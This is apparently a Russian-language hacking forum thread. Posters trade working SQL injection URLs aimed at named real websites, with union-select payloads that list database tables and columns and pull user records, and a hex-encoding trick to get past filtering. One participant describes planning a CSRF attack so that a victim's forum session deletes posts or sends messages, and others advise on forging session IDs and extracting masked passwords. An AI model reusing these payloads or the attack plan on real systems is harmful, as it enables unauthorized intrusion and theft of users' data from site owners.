Кодировка сдесь не причём, гораздо важнее какая база . В Access такое бывает, какой-то алгоритм хеширования пароля Если мускул , то или aes_encrypt(скорее всего), или самопис какой-то, по одному значению непонятно. С этим ты ничего не поделаешь, если только ключ угадаешь
Так в чем проблема-то? Code: http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--
TELO в этой таблице нет пассов http://www.postgresql.org/docs/7.4/static/view-pg-user.html Ищи другую
мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"
Как по вашему мнению за что может отвечать переменая сид в урл такого вида posting.php?mode=delete&p=40&sid=790c50da612628e41f4f900a830920c5 Я понимаю может этот вопрос выглядил глупо,просто я пытаюсь осуществить на сайт атаку CSRF!Мне кажется эта переменая мне и мешает пишет мол ошибка сесии!Сильно не ругайте!
Я в пыхе не очень,но понял на счет переменной сид вот что: если $сид пуста или $сид не равна $юсердата со значением $сесион_ид(если праильно понял $сесион_ид в таких скобках [] была)то показать ошибку на счет сесии как я писал где переменая $юсердата равна $ип и $логин,а $сесион_ид равна $ип,$автологин,$админ,$юсер_ид и еще 2словам без знака переменых это наверное значение из таблицы мускула!Кто подскажет обломавыется ли моя CSRF?Может я смогу подделать эту переменую сид.
Qam хз че ты написал чесно в пол третьего ночи тяжело думается, а поделу SID ето тот идентификатор с которым ты лазишь по форумк послу того как успешно залогинился, он может связываться с твоим логином на сайте а может и с логином и пароль сразу , хранится в базе на серве до окончания сессии пока не пройдет определенное количество времени или ты не закроешь браузер, если ты думаешь что тупо изменить СИД на другой СИд другого юзверя то такой вариант прокатит только если в кукисах не хранится твой зашифрованный пароль, и если СИД еще жив (тоесть жертва не закрыла браузер)
RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!
а как с такой таблы достать поля? FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит Code: http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+user+from+tk_users--
1.как узнать количество полей? http://elitka.com.ua/view.php?id=381%27 2. и вот такая трабла Code: http://vitlen.com.ua/index.php?categoryID=128%20order%20by%201%20-- отбражает исходную Code: http://vitlen.com.ua/index.php?categoryID=128%20UNION%20SELECT%201%20-- вывод The used SELECT statements have a different number of columns
за хекси Users а знак (=) замени на like FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1
непрокатило Code: http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20LIKE=0x5573657273%20LIMIT%200,1%20--
